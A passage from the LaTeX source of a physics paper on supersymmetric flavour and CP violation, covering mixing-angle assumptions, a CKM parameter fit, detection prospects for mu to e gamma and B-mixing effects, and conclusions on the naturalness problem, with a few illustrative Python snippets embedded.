that we consider more strongly motivated~\cite{FVGUT}:
order one 12/3 splitting
(i.e. $\eta_f\sim1/2$) and 12/3 mixing angles of the order of the CKM ones
(i.e. $V_{f\tilde{f}}\sim V_{\rm CKM}$)\footnote{
This scenario is motivated by the following considerations.
The largeness of the top quark Yukawa coupling, $\lambda_t$, suggests that the unknown flavour physics
distinguishes the third generation from the other ones.
This is for example the case of a U(2) flavour symmetry~\cite{U2}.
A stronger motivation for $\eta_f\neq 1$ comes from unification~\cite{HKR,FVGUT}:
the running of the soft terms in a unified theory gives $\eta_f<1$ even if $\eta_f=1$ at tree level,
due to the large value of the unified top quark Yukawa coupling.
If $\lambda_{t}(M_{\rm GUT})\circa{>}1$ this minimal effect is always very large~\cite{LFV}.
However these values of $\lambda_{t}(M_{\rm GUT})$ close to its IR fixed point
accommodate the measured top mass only for $\tan\beta\circa{<}2$ ---
a range now disfavoured by the higgs mass bound together with naturalness consideration.
At larger $\tan\beta\gg 2$ a top mass in the measured range requires
$\lambda_{t}(M_{\rm GUT})=0.35\div0.55$:
for this smaller value the RGE running of the unified soft terms gives $\eta\sim0.8$.
More precisely, depending on the details of the model
the effect in $\eta$ can be large ($\eta=0.5$) or very small ($\eta=0.95$).
}.
For simplicity we continue to assume that all the sfermions of
each generation have a common mass at the unification scale (i.e.\ $m_{i\tilde{f}}=m_i$,
so that $\eta_f=\eta$) and we assume that no new effect of this kind comes from the $A$ terms.
In the limit $\eta_f\to 0$ only the third generation sparticles have mass around the electroweak scale.
If the third generation sleptons also have masses of a few TeV,
we encounter the scenario named `effective supersymmetry' in~\cite{EffectiveSUSY}.
In the opposite limit, $\eta_f\to 1$, we reduce to the `mass insertion' approximation~\cite{HKR}.
In both these cases the loop functions relevant for the various effects reduce to particular limits.
Since we consider non degenerate sfermions, we cannot use the `mass insertion' parametrization
(it is trivial to generalize it; but it becomes cumbersome since in some cases the dominant
effects come from diagrams with two or three mass insertions).
We choose $\eta_f=0.5$
(i.e.\ {\em all\/} the sfermions of the third generation are significantly lighter than the other ones,
a perhaps too optimistic assumption)
and we allow the fermion/sfermion mixing angles to vary in the range
\begin{eqnsystem}{sys:W}
|V_{e_L\tilde{\tau}_L}|, |V_{e_R\tilde{\tau}_R}|,
|V_{d_L\tilde{b}_L}|, |V_{d_R\tilde{b}_R}|&=&(\frac{1}{3}\div 3) |V_{td}|~~~~\\
|V_{\mu_L\tilde{\tau}_L}|, |V_{\mu_R\tilde{\tau}_R}|,
|V_{s_L\tilde{b}_L}|, |V_{s_R\tilde{b}_R}|&=&(\frac{1}{3}\div 3) |V_{ts}|~~~~
\end{eqnsystem}
(all angles are renormalized at the unification scale;
we assume that at the weak scale $V_{ts}=0.04$ and $V_{td}=0.01$)
with complex phases of order one.
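One way to sample such an angle is with a modulus log-uniform in the quoted $(\frac{1}{3}\div3)$ range and an order-one phase; the log-uniform measure is our own assumption for illustration, since the text does not specify the scanning measure for these angles:

```python
import cmath
import math
import random

def sample_mixing_angle(rng, V_ckm):
    """Complex fermion/sfermion mixing angle with modulus log-uniform
    in (1/3 .. 3) * |V_ckm| and an order-one phase.  The log-uniform
    measure is an assumption made here for illustration."""
    modulus = V_ckm * math.exp(rng.uniform(math.log(1 / 3), math.log(3)))
    phase = rng.uniform(-math.pi, math.pi)
    return modulus * cmath.exp(1j * phase)

rng = random.Random(0)
V_ts, V_td = 0.04, 0.01   # weak-scale values used in the text
angle = sample_mixing_angle(rng, V_ts)
```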
Mixing angles in the up-quark sector are less motivated and thus less controllable.
Their possible contribution to the neutron EDM will not be discussed here.
Studying this case is a good starting point for understanding what happens in similar cases.
At the end of this subsection we will comment on how our results change if one of
our simplifying but questionable assumptions is abandoned.
\begin{table}[b]
\begin{center}
$$\begin{array}{|c|c|}\hline
\chbox{parameter}&\chbox{value}\\ \hline
\Delta m_{B_d} & (0.471\pm0.016)/\hbox{ps}\\
\Delta m_{B_s} & \circa{>}12.4/\hbox{ps, see~\cite{BsBound}}\\
\varepsilon_K & (2.28\pm0.02)\cdot10^{-3}\\
V_{ub}/V_{cb} &0.093\pm0.016\\
m_t(m_t) & (166.8\pm5.3)\,{\rm GeV}\\ \hline
m_c(m_c) & (1.25\pm0.15)\,{\rm GeV}\\
A & 0.819\pm0.035\\
B_K & 0.87\pm0.14\\
B_B^{1/2} f_B & 0.201\pm0.042\\
\xi &1.14\pm0.08\\
\eta_1 & 1.38 \pm 0.53\\
\eta_2 & 0.574 \pm 0.004\\
\eta_3 & 0.47 \pm 0.04\\
\eta_B & 0.55 \pm 0.01\\ \hline
\end{array}$$
\caption[SP]{\em Values of parameters used in the determination of $(\rho,\eta)$.
The parameters in the upper rows have mainly experimental errors;
the parameters below the middle horizontal line have
dominant theoretical errors.
\label{tab:fit}}
\end{center}\end{table}
Having made specific (but motivated) assumptions, we can now compute
the resulting supersymmetric effects\footnote{The supersymmetric effects are computed as follows.
We take the expressions of the leptonic observables from~\cite{LFV}
and the hadronic ones from~\cite{HFV} (where some of them are only given in simplifying limits);
the supersymmetric CP asymmetry in $b\to sss$ is taken from~\cite{b->sss}.
We have assumed, as in~\cite{b->sss},
that the largely unknown $\mathop{\rm BR}(B_d\to\phi K_S)$ is $10^{-5}$ --- a value consistent
with the most reliable phenomenological estimate~\cite{charming}.
To compute the CP asymmetries in $b\to s\gamma$ we use the general formul\ae{} in~\cite{Rbsg,Absg}.
In the computation of $\Delta m_B$ and $\varepsilon_K$ we add some important
corrections with respect to previous analyses:
we include the recently correctly computed QCD corrections~\cite{SUSY-QCD-RGE}
and the very recent lattice values of the matrix elements of the
$\Delta B,\Delta S=2$ supersymmetric effective operators~\cite{SUSY-BB,SUSY-BK}.
Moreover we correct an error in the supersymmetric Wilson coefficient for $\Delta m_B$ in~\cite{HFV,b->sss}
(by coincidence, the error only causes an irrelevant flip of the sign
of the effect in the semi-realistic limit $M_3=m_{\tilde{b}}$).
See appendix~B for the details.}
using our naturalness distribution of sparticle masses.
The results are shown in figs.~\ref{fig:LHFV}.
The labels below each plot indicate its content;
a longer description is given in the caption.
We define here precisely the content of the two plots on the right.
The new supersymmetric effects that we are studying
do not significantly affect $\mathop{\rm BR}(b\to s\gamma)$,
but can modify its chiral structure in a detectable way.
In the upper-right plot we show
the supersymmetric contribution to the direct CP asymmetry $|A_{\rm dir}^{b\to s\gamma}|$~\cite{Rbsg} defined by
$$A_{\rm dir}^{b\to s\gamma}\equiv \left.\frac{\Gamma(\bar{B}_{\bar{d}}\to X_s\gamma)-\Gamma(B_d\to X_{\bar{s}} \gamma)}
{\Gamma(\bar{B}_{\bar{d}}\to X_s\gamma)+\Gamma(B_d\to X_{\bar{s}} \gamma)}\right|_{E_\gamma>0.7 E_\gamma^{\rm max}}.$$
In the lower-right plot we show the supersymmetric contribution to
the mixing-induced CP asymmetry~\cite{Absg}
$|A_{\rm mix}^{b\to s\gamma}|$ defined by
$$\frac{\Gamma(\bar{B}_{\bar{d}}(t)\to M \gamma)-\Gamma(B_d(t)\to M \gamma)}
{\Gamma(\bar{B}_{\bar{d}}(t)\to M\gamma)+\Gamma(B_d(t)\to M \gamma)} =
\pm A_{\rm mix}^{b\to s\gamma} \sin(|\Delta m_{B_d}| t)$$
where $\pm$ is the CP eigenvalue of the CP eigenstate $M$.
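As a trivial check of the definitions above, the asymmetries are just normalized rate differences; a minimal sketch (the rate values below are placeholders, not measurements):

```python
def direct_cp_asymmetry(gamma_bbar, gamma_b):
    """A_dir = (Gamma(Bbar -> Xs gamma) - Gamma(B -> Xsbar gamma)) / (sum),
    with both rates taken above the photon-energy cut E_gamma > 0.7 E_max."""
    return (gamma_bbar - gamma_b) / (gamma_bbar + gamma_b)

# Equal rates give zero asymmetry; a 1% rate difference gives A_dir ~ 0.5%,
# the size of the SM expectation quoted below
assert direct_cp_asymmetry(1.0, 1.0) == 0.0
assert abs(direct_cp_asymmetry(1.01, 1.0) - 0.005) < 1e-4
```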
If the Wolfenstein parameters $\rho$ and $\eta$
are given by the fit in fig.~\ref{fig:fit}a, in the SM
$A_{\rm dir}^{b\to s\gamma}\approx +0.5\%$ and $A_{\rm mix}^{b\to s\gamma}\approx 5\%$.
It is however difficult to find particles $M$ that allow a precise measurement
of $A_{\rm mix}^{b\to s\gamma}$~\cite{Absg}.
We see that a non-zero $\mathop{\rm BR}(\mu\to e\gamma)$
(proportional to $\mathop{\rm BR}(\mu\to e\bar{e}e)$ and
to the similar effect of $\mu\to e$ conversion~\cite{LFV},
and strongly correlated with $d_e$)
is the most promising candidate for a detectable effect.
For a precise interpretation of the results we first discuss
how large the various effects are now allowed to be,
and the future experimental prospects.
\subsubsection{Allowed supersymmetric effects}
Many of the experimental bounds are the same as the ones quoted in~\cite{LFV,HFV}.
Only the bounds on the $\mu\to e\gamma$ decay and on $\mu\to e$ conversion
have been slightly improved by the {\sc Mega} and {\sc SindrumII} experiments.
The present bounds are
$\mathop{\rm BR}(\mu\to e\gamma)<3.8\cdot10^{-11}$~\cite{BRmuegNEW} and
$\hbox{CR}(\mu\hbox{Ti}\to e\hbox{Ti})<6.1\cdot10^{-13}$~\cite{CRmueNEW}.
It is less clear how large a supersymmetric correction to $\varepsilon_K$
(i.e.\ to CP violation in $K\bar{K}$ mixing)
the present experimental data allow.
The detailed study of this question is interesting because low energy QCD effects
enhance the supersymmetric contribution to $\varepsilon_K$,
which for this reason becomes one of the most promising hadronic effects.
We can answer this question by performing a SM fit of the relevant experimental data
(i.e. the values of $\varepsilon_K$, $\Delta m_{B_d}$, $V_{ub}/V_{cb}$
and the bound on $\Delta m_{B_s}/\Delta m_{B_d}$)
with $\varepsilon_K$ itself excluded from the data to be fitted.
It has been recently noticed~\cite{FitNoEps,Mele} that this kind of fit gives an interesting result:
even omitting $\varepsilon_K$ (the only so far observed CP-violating effect)
a `good' fit is possible only in the presence of CP violation.
We address this question in fig.~\ref{fig:fit}, where we show the best-fit values of
the Wolfenstein parameters $(\rho,\eta)$. In the improved Wolfenstein parametrization of the CKM matrix,
\begin{eqnarray*}
V_{ub}&=&|V_{ub}|e^{-i\gamma_{\rm CKM}}=A\lambda^3(\rho-i\eta)\\
V_{td}&=&|V_{td}|e^{-i\beta_{\rm CKM}}=A\lambda^3(1-{\textstyle{1\over 2}}\lambda^2)(1-\rho-i\eta).
\end{eqnarray*}
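The CKM phases follow directly from $(\rho,\eta)$ in this parametrization; a quick numerical sketch, taking $A$ from table~\ref{tab:fit} and assuming the standard value $\lambda\simeq0.22$ (not quoted in the text), with an arbitrary sample point in the $(\rho,\eta)$ plane:

```python
import cmath

A, lam = 0.819, 0.22     # A from the table; lambda ~ Cabibbo angle (assumed)
rho, eta = 0.2, 0.35     # arbitrary sample point, not a fit result

# Improved Wolfenstein parametrization quoted in the text
V_ub = A * lam**3 * (rho - 1j * eta)
V_td = A * lam**3 * (1 - 0.5 * lam**2) * (1 - rho - 1j * eta)

gamma_ckm = -cmath.phase(V_ub)   # V_ub = |V_ub| e^{-i gamma_CKM}
beta_ckm  = -cmath.phase(V_td)   # V_td = |V_td| e^{-i beta_CKM}

# For eta = 0 the CKM matrix is real and both phases vanish
assert abs(cmath.phase(A * lam**3 * (0.3 - 1j * 0.0))) < 1e-12
```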
In table~\ref{tab:fit} we list the values of the parameters used in the fit
(we use the same notations and values of~\cite{Mele}).
If we treat the errors on these parameters
as standard deviations of Gaussian distributions, we obtain the fit
shown in fig.~\ref{fig:fit}a ($\varepsilon_K$ included in the fit)
and \ref{fig:fit}b ($\varepsilon_K$ not included in the fit).
If we instead assume that the parameters $\wp$ with theoretical uncertainty $\Delta\wp$
have a flat distribution with the same variance as the Gaussian one,
the result of the fit is essentially the same.
The case $\eta=0$ (no CP violation in the CKM matrix) fits the data worse than other values,
but is not completely outside the $99\%$ `best fit' region, as found in~\cite{Mele}.
Since there are only a few data to be fitted and the `good fit' region is not very small,
it is not completely safe to use the standard approximate analytic fitting techniques~\cite{fittologia}
(we have performed our fit using a Monte Carlo technique).
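The structure of such a Monte Carlo scan can be sketched as follows; the toy `predict_obs` function and the two inputs used are placeholders, not the real SM expressions for $\varepsilon_K$ or $\Delta m_B$, so this only illustrates the procedure:

```python
import random

# Toy Gaussian-distributed theory inputs: (central value, error)
inputs = {"A": (0.819, 0.035), "B_K": (0.87, 0.14)}

def predict_obs(rho, eta, params):
    """Placeholder prediction: NOT the real SM formula for any observable."""
    return params["A"] * params["B_K"] * eta * (1.0 - rho)

def chi2_of_point(rho, eta, data, error, n_mc=2000):
    """Monte Carlo over the theory parameters, then a chi^2 against the data;
    this mimics asking how compatible a given (rho, eta) is with experiment,
    irrespective of whether other points fit better."""
    random.seed(1)
    preds = []
    for _ in range(n_mc):
        params = {k: random.gauss(mu, sig) for k, (mu, sig) in inputs.items()}
        preds.append(predict_obs(rho, eta, params))
    mean = sum(preds) / n_mc
    var = sum((p - mean) ** 2 for p in preds) / n_mc
    return (mean - data) ** 2 / (error ** 2 + var)

# A point whose prediction matches the data has a small chi^2
assert chi2_of_point(0.2, 0.35, 0.1995, 0.05) < 2.0
```

Swapping the Gaussian draws for flat distributions of equal variance changes the result very little, as stated below for the actual fit.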
More importantly, in such a situation the exact result of the fit in general depends
on the choice of the parameters to be fitted ---
for example the CKM angles $\beta_{\rm CKM}, \gamma_{\rm CKM}$ instead of $\rho, \eta$.
This dependence becomes more important when studying whether
the experimental data on $\Delta m_{B_d}$, $\Delta m_{B_s}$ and $|V_{ub}/V_{cb}|$
allow the CKM matrix to be real ($\eta=0$).
To overcome all these problems we directly study how well any given particular value
of $(\rho,\eta)$ is compatible with the experimental data,
irrespective of whether other values fit the data better or worse.
When there are only a few experimental data, this question is not necessarily numerically equivalent to asking
which values of the parameters give the `best fit'.
Again the results of this kind of analysis do not depend significantly on the shape
(Gaussian or flat) of the distribution of the parameters with dominant theoretical error.
The result is shown in fig.~\ref{fig:fit}c,
assuming Gaussian distributions for all uncertainties.
We see that if $\eta=0$ and $\rho\sim0.3$ there is no unacceptable discrepancy between the
experimental data and the theoretical predictions
(using flat distributions $\eta=0$ and $\rho\sim0.3$ would be perfectly allowed).
We conclude\footnote{We however mention that a preliminary Tevatron study of the CP asymmetry
in the decay $B_d\to \psi K_S$~\cite{TevatronEta}
disfavours negative values of $\eta$. }
that we cannot exclude a SM contribution to $\varepsilon_K$ in the range
$(-2.5\div 2.5)\varepsilon_K^{\rm exp}$.
Consequently we will consider a supersymmetric correction to $\varepsilon_K$ smaller than
$3.5\,\varepsilon_K^{\rm exp}$ to be allowed.
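The quoted numbers are related by simple arithmetic: if the SM part may lie anywhere in $(-2.5\div2.5)\,\varepsilon_K^{\rm exp}$ while the total must reproduce the measured $\varepsilon_K^{\rm exp}$, the supersymmetric part may need to be as large as $3.5\,\varepsilon_K^{\rm exp}$:

```python
# Everything in units of eps_K^exp
sm_min, sm_max = -2.5, 2.5       # allowed SM contribution (from the fit above)
total = 1.0                      # the measured value, eps_K^exp

# SUSY must supply the difference between the measurement and the SM part
susy_max = max(abs(total - sm_min), abs(total - sm_max))
assert susy_max == 3.5           # -> the 3.5 eps_K^exp bound used in the text
```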
\subsubsection{Detectable supersymmetric effects}
The next question is: how sensitive will the experiments performed in the near future be to new physics?
A planned experiment at PSI is expected to explore
$\mathop{\rm BR}(\mu\to e \gamma)$ down to $10^{-14}$~\cite{muegNewExp}.
It seems possible to improve the search for the electron EDM
(and maybe also the search for the neutron EDM) by an order of magnitude~\cite{deBerk}.
Concerning $B$ and~$K$ physics,
various new experiments will be able to measure CP asymmetries accurately.
With the possible exception of $A_{\rm mix}^{b\to s\gamma}$, which is difficult to measure,
the discovery potential is however severely limited by the fact that the SM background has large QCD uncertainties.
For example the precise measurement of the phase of $B$ mixing
(obtainable from the CP asymmetry in $B_d(t)\to\psi K_S$),
$\varphi_{B_d}=2\beta_{\rm CKM}+\varphi_{B_d}^{\rm SUSY}$,
determines neither the value of $\beta_{\rm CKM}\equiv\arg V_{td}^*$ nor whether a supersymmetric effect
$\varphi_{B_d}^{\rm SUSY}\neq0$ is present.
All proposed strategies that allow one to disentangle the supersymmetric contribution
from the SM background
suffer from disappointingly large (few $10\%$) hadronic uncertainties:
\begin{itemize}
\item
One way of searching for a supersymmetric effect in $B$ mixing is the following.
If one assumes an approximate SU(3) symmetry among the three light quarks $(u,d,s)$,
it is possible to reconstruct the unknown SM gluonic penguins
(which affect the decay modes that allow one to separate $\beta_{\rm CKM}$ and $\varphi_{B_d}^{\rm SUSY}$)
from the branching ratios of the decays $B^+_d\to \pi^+ K^0$,
$B^0_d\to\pi^-K^+$, $B^0_d\to\pi^+\pi^-$ and their CP conjugates~\cite{ReconstrPenguin}.
In this way it seems possible to detect a $30\%$ correction
to the phase of $B^0_d\bar{B}^0_{\bar{d}}$ mixing~\cite{b->sss}.
\item
Another way of searching for a supersymmetric effect in $B$ mixing is the following.
In the SM the di-lepton asymmetry in $B_d\bar{B}_{\bar{d}}$ decays~\cite{AllSM,AllSUSY} is given by
$$A^{\rm SM}_{\ell\ell}=\Im\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}}\approx
0.001\arg\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}}\approx 10^{-3}$$
($M_{12}-i\Gamma_{12}/2$ is the off-diagonal element of the effective Hamiltonian in the ($B,\bar{B})$ basis)
and is suppressed due to a cancellation between contributions of the $u$ and $c$ quarks.
This cancellation could be significantly upset by unknown QCD corrections~\cite{AllSM}.
If this does not happen, lepton asymmetries are a useful probe of a SUSY effect~\cite{AllSUSY}:
$$A_{\ell\ell}^{\rm SUSY}=\Im\frac{\Gamma_{12}^{\rm SM}}{M_{12}^{\rm SM}+M_{12}^{\rm SUSY}}\approx
A^{\rm SM}_{\ell\ell}\frac{10^{-3}}{A^{\rm SM}_{\ell\ell}}10\varphi_{B_d}^{\rm SUSY}.$$
\item From a SM fit of the future precise experimental data
(i.e.\ using, for example, a measurement of $\Delta m_{B_s}$ and of the CP asymmetry in $B_d\to\psi K_S$)
it will be possible to predict the SM value of $\varepsilon_K$ with an
uncertainty of about $25\%$, mainly due to the future uncertainties on
the Wolfenstein parameter $A$ and on
the matrix element of the operator that gives $\varepsilon_K$ in the SM,
determined with lattice techniques.
A real improvement in the lattice computation will come only when
it becomes possible to avoid the `quenching' approximation.
We estimate (maybe a bit optimistically) that it will be possible to detect
supersymmetric corrections to $\varepsilon_K$
larger than $30\%\cdot\varepsilon_K^{\rm exp}$.
It will also be possible to try to detect a supersymmetric correction to the phase of
$B$ mixing from a global fit of the future experimental data;
it is not possible to say now whether this technique can be more efficient than
the direct ones discussed above.
\end{itemize}
A theoretically clean way of detecting a supersymmetric correction to CP violation
in $B\bar{B}$ mixing would result from
a precise determination of the phase of $B_s$ mixing
(which is very small in the SM, but whose measurement does not seem experimentally feasible)
or of $\mathop{\rm BR}(K^+\to\pi^+\nu\bar{\nu})/\mathop{\rm BR}(K_L\to\pi^0\nu\bar{\nu})$
(which has small QCD uncertainties~\cite{Burassone}).
Hopefully these decay rates will be measured with $\sim\pm10\%$ accuracy in the year 2005~\cite{BNL}.
Apart from this possibility we know of no way to detect
corrections to $B$ and $K$ mixing
from new physics smaller than $(20\div30)\%$.
As a consequence we cannot be sure that a precise measurement of the
CP asymmetry in $B\to \psi K_S$
really measures the CKM angle $\beta_{\rm CKM}$, or
whether it is instead contaminated by a $\sim10\%$ new-physics contribution.
To summarize this long discussion, we have added to each plot of fig.~\ref{fig:LHFV}
a horizontal {\special{color cmyk 0 1. 1. 0.5} dashed line\special{color cmyk 0 0 0 1.}} that delimits
the smallest effect that we estimate to be detectable
(while the continuous lines delimit already excluded effects).
\subsubsection{Discussion}
We have computed the loop effects characteristic of `non-minimal' supersymmetry
assuming a 12/3 splitting
between the three generations of sfermions with $\eta_f=1/2$ (see eq.\eq{eta}).
We now discuss what happens if we modify our assumptions.
The mechanism that motivates $\eta_f\neq 1$ could produce a much stronger splitting, $\eta_f\ll 1$.
This limiting case is interesting also for different reasons~\cite{EffectiveSUSY}.
If $\eta_f\approx 0$, leptonic effects are too large in about $80\%$ of the parameter space
and are almost always discoverable by planned experiments.
Among the hadronic observables,
a detectable supersymmetric effect is sometimes contained in $\varepsilon_K$ and $d_N$,
while CP violation in $B$ mixing and decays ($b\to s\gamma$, $b\to s\bar{s}s$)
is interesting only for some values of the parameters
that produce too large effects in the other leptonic and hadronic observables.
Alternatively, the 12/3 mass non-degeneracy could be smaller.
If $\eta=0.9$ the GIM-like cancellation is so strong that
no effect exceeds the experimental bounds, but
leptonic effects remain discoverable in almost $50\%$ of the parameter space.
Some hadronic effects still have a small possibility of being discoverable
($\varepsilon_K$, $d_N$, CP violation in $B$ decays).
If $\eta=0.95$ only the leptonic signals have a
low probability ($\sim5\%$) of being discoverable.
\medskip
Apart from the value of $\eta$, our simplifying but questionable
assumptions could be incorrect in different ways:
\begin{enumerate}
\item We have assumed that all the sfermions of the third generation are lighter than the
corresponding ones of the first two generations.
Maybe only some types of sfermions
have a significant 12/3 non-degeneration:
for example, the ones unified in a 10-dimensional representation of SU(5).
In this case $\mathop{\rm BR}(\mu\to e\gamma)$ gets suppressed by a factor $\sim (m_\mu/m_\tau)^2$,
but likely remains the only interesting signal of new physics.
It could instead happen that the squarks (but not the sleptons) have a significant 12/3 non-degeneration.
In this unmotivated case a detectable effect in $B$ physics is possible, and is always accompanied
by a detectable correction to $\varepsilon_K$ and often by a neutron EDM larger than $10^{-26}\,e\cdot\hbox{cm}$.
\item We have assumed fermion/sfermion mixing angles of the same order as the CKM ones.
Recent neutrino data~\cite{SK-atm} suggest the presence of a large mixing angle
in the leptonic sector.
It is easy to compute how the various effects get enhanced in the presence of some mixing angle
larger than the CKM-like ones assumed in eqs.~(\ref{sys:W}).
\item We have assumed that the $A$ terms alone do not induce interesting effects.
In unification models the masses of light quarks and leptons do not obey simple unification relations:
this suggests that they arise from higher-dimensional operators with a complex gauge structure.
In this case, the $A$ terms cannot be universal and can induce
a new large effect in $\mu\to e \gamma$~\cite{muegA} and a possibly detectable CP asymmetry in $b\to s\gamma$.
\end{enumerate}
In none of these cases is CP violation in $B$ mixing an interesting effect.
Even if supersymmetry gives rise to larger effects than the motivated ones that we have studied here,
an effect in $B$ mixing is severely limited by
the necessity of avoiding too large effects in leptonic observables, in EDMs and in $\varepsilon_K$
(but cannot be excluded, because all bounds can be evaded in one particular situation).
\section{Conclusions}\label{fine}
In conclusion, the negative results of the recent searches for supersymmetric particles, performed mostly at LEP2,
pose a serious naturalness problem for all `conventional' supersymmetric models.
Fig.~\ref{fig:example} illustrates the problem
in a simple case where it is as mild as possible.
Why should the numerical values of the supersymmetric parameters
lie very close to the limiting value beyond which
electroweak symmetry breaking is not possible?
There are two opposite attitudes towards the problem,
which give rise to different interesting conclusions.
\smallskip
One may think that supersymmetry has escaped detection due to an unlucky numerical accident.
This happens with a $\sim5\%$ probability (or less in various particular models),
so that this unlucky event is not very improbable.
If this is the case we can study the naturalness probability distribution
of supersymmetric masses in the small remaining allowed range of parameters
of each model.
It is no longer very unlikely that the coloured sparticles have masses of a few TeV due to an
accidental cancellation stronger than the `minimal' one necessary to explain the experiments.
A second accident --- just as improbable as the one that has prevented the discovery of supersymmetry at LEP2 ---
could do the same job at LHC
(assuming that it will not be possible to detect coloured sparticles heavier than 2 TeV;
when the coloured sparticles are so heavy,
the charginos and neutralinos are also too heavy to be detected
via pair production followed by decay into three leptons~\cite{3lept}).
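As a rough numerical illustration of how unlikely such a double accident is (treating the two accidents as independent, which is our assumption):

```python
p_accident = 0.05                      # ~5% naturalness probability quoted above
p_two_accidents = p_accident ** 2      # a LEP2 accident AND a second one at LHC

# Two independent ~5% accidents combine to roughly 0.25%
assert abs(p_two_accidents - 0.0025) < 1e-12
```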
Even so, LHC has very favourable odds of discovering supersymmetry.
Before LHC, we estimate that there is
a $40\%$ probability of detecting a supersymmetric correction to $\mathop{\rm BR}(B\to X_s\gamma)$ and
a $10\%$ probability that supersymmetry affects the anomalous magnetic moment of the muon in a detectable way.
Other interesting supersymmetric signals are naturally possible only if
supersymmetry gives rise to new flavour and CP violating phenomena.
A detectable effect of this kind can be present almost everywhere
for appropriate values of the hundreds of unknown relevant supersymmetric parameters.
For this reason we have concentrated our attention on a subset of strongly
motivated, and thus controllable, signals~\cite{FVGUT}.
We find that $\mu\to e \gamma$ and the electron EDM are interesting
candidates for a supersymmetric effect.
Effects in the hadronic sector are possible but not very promising
(the neutron EDM and $\varepsilon_K$ seem more interesting
than CP violation in $B$ mixing and decays: see figs.~\ref{fig:LHFV}).
\smallskip
On the other hand, one may instead think that $5\%$ is a small probability:
after all, 95\% is often used as a confidence level
for excluding unseen effects.
If one still believes that supersymmetry at the weak scale solves the SM naturalness problem,
the supersymmetric naturalness problem motivates the search for unconventional
models that naturally account for the negative results of the experimental searches.
The problem would be alleviated by an appropriate correlation, for example between $\mu$ and $M_3$.
We know of no model that makes this prediction;
the naturalness problem implies that any model really capable of predicting $\mu/M_3$
has a large probability of making a wrong prediction.
Even if some high-energy model predicted the desired cancellation,
this delicate cancellation would not survive at low energy due to large RGE corrections.
In other words the required value of $\mu/M_3$ depends on the values of $\alpha_3,\lambda_t,\ldots$
(for example we need $\mu(M_{\rm GUT})/M_3(M_{\rm GUT})\approx1.5$ if $\lambda_{t\rm G}=0.5$,
and $\approx 2.5$ if $\lambda_{t\rm G}=1$).
Models where supersymmetry breaking is mediated at lower energy can thus have some chance of being more natural.
However, exactly the opposite happens in the only appealing models of this kind: gauge mediation models.
These models predict that the right-handed sleptons are lighter than the mass scale in the Higgs potential,
so that the naturalness problem is stronger than in supergravity models.
More importantly, if the supersymmetry-breaking scale is so low that
the neutralino decays in a detectable way,
both LEP and Tevatron experiments give such stringent experimental bounds
on the neutralino mass that this scenario becomes unnatural.
A different way of alleviating the problem consists in having a sparticle spectrum
more degenerate than the `conventional' one.
Since the Tevatron direct bound on the gluino mass is weaker than the indirect bound
obtained from LEP2 assuming gaugino mass universality,
it is possible to reduce the mass of coloured particles
(and consequently their large RGE corrections to the $Z$ mass, that sharpen the naturalness problem)
by assuming that gaugino mass universality is strongly broken.
This possibility has recently been discussed in~\cite{bau} in the context of supergravity.
A gauge mediation model that gives a sparticle spectrum different
from the conventional one (by assuming an unconventional messenger spectrum) has been constructed in~\cite{FTred}.
In both cases, the more degenerate sparticle spectrum
allows one to significantly reduce the original FT parameter.
Still, we believe that these solutions do not completely remove the unnaturalness.
Even if all the sparticles and the $W$ and $Z$ bosons now have arbitrary but comparable masses,
why have only the SM vector bosons, and not one of the many ($\sim10$) detectable sparticles,
been observed with mass below $M_Z$?
It will be possible to explore this possibility concretely at the Tevatron in the coming years.
Finally, a more original (but apparently problematic) approach is discussed in~\cite{CP}.
To conclude, we know of no model that really predicts that sparticles are heavier than the $Z$ boson
(while we know many models that make the opposite prediction).
\paragraph{Acknowledgments}
We thank R. Barbieri, G. Martinelli, S. Pokorski and R. Rattazzi for useful discussions.
A.R.\ and A.S.\ thank the Scuola Normale Superiore and INFN of Pisa.
One of us (A.R.) wishes to thank
the Theoretical Physics Department of Technical University
of Munich where part of this work has been done.
$$
\special{color cmyk 0.1 0.1 0. 0.}\bullet~
\special{color cmyk 0.2 0.2 0. 0.}\bullet~
\special{color cmyk 0.3 0.3 0. 0.}\bullet~
\special{color cmyk 0.4 0.4 0. 0.}\bullet~
\special{color cmyk 0.5 0.5 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.7 0.7 0. 0.}\bullet~
\special{color cmyk 0.8 0.8 0. 0.}\bullet~
\special{color cmyk 0.9 0.9 0. 0.}\bullet~
\special{color cmyk 0.8 0.8 0. 0.}\bullet~
\special{color cmyk 0.7 0.7 0. 0.}\bullet~
\special{color cmyk 0.6 0.6 0. 0.}\bullet~
\special{color cmyk 0.5 0.5 0. 0.}\bullet~
\special{color cmyk 0.4 0.4 0. 0.}\bullet~
\special{color cmyk 0.3 0.3 0. 0.}\bullet~
\special{color cmyk 0.2 0.2 0. 0.}\bullet~
\special{color cmyk 0.1 0.1 0. 0.}\bullet
$$
\special{color cmyk 0 0 0 1.}
\newcommand\oOme{{\overline{\Ome}}}
\newcommand\ophi{\overline{\phi}}
\newcommand\oPhi{{\overline{\Phi}}}
\newcommand\opi{{\overline{\pi}}}
\newcommand\oPsi{{\overline{\Psi}}}
\newcommand\opsi{{\overline{\psi}}}
\newcommand\orho{{\overline{\rho}}}
\newcommand\osig{{\overline{\sig}}}
\newcommand\otau{{\overline{\tau}}}
\newcommand\otet{{\overline{\theta}}}
\newcommand\oxi{{\overline{\xi}}}
\newcommand\oome{\overline{\ome}}
\newcommand\opart{{\overline{\partial}}}
\newcommand\ua{{\underline{a}}}
\newcommand\uA{{\underline{A}}}
\newcommand\ub{{\underline{b}}}
\newcommand\uB{{\underline{B}}}
\newcommand\uc{{\underline{c}}}
\newcommand\uC{{\underline{C}}}
\newcommand\ud{{\underline{d}}}
\newcommand\uD{{\underline{D}}}
\newcommand\ue{{\underline{e}}}
\newcommand\uE{{\underline{E}}}
\newcommand\uf{{\underline{f}}}
\newcommand\uF{{\underline{F}}}
\newcommand\ug{{\underline{g}}}
\newcommand\uG{{\underline{G}}}
\newcommand\uh{{\underline{h}}}
\newcommand\uH{{\underline{H}}}
\newcommand\ui{{\underline{i}}}
\newcommand\uI{{\underline{I}}}
\newcommand\uj{{\underline{j}}}
\newcommand\uJ{{\underline{J}}}
\newcommand\uk{{\underline{k}}}
\newcommand\uK{{\underline{K}}}
\newcommand\ul{{\underline{l}}}
\newcommand\uL{{\underline{L}}}
\newcommand\um{{\underline{m}}}
\newcommand\uM{{\underline{M}}}
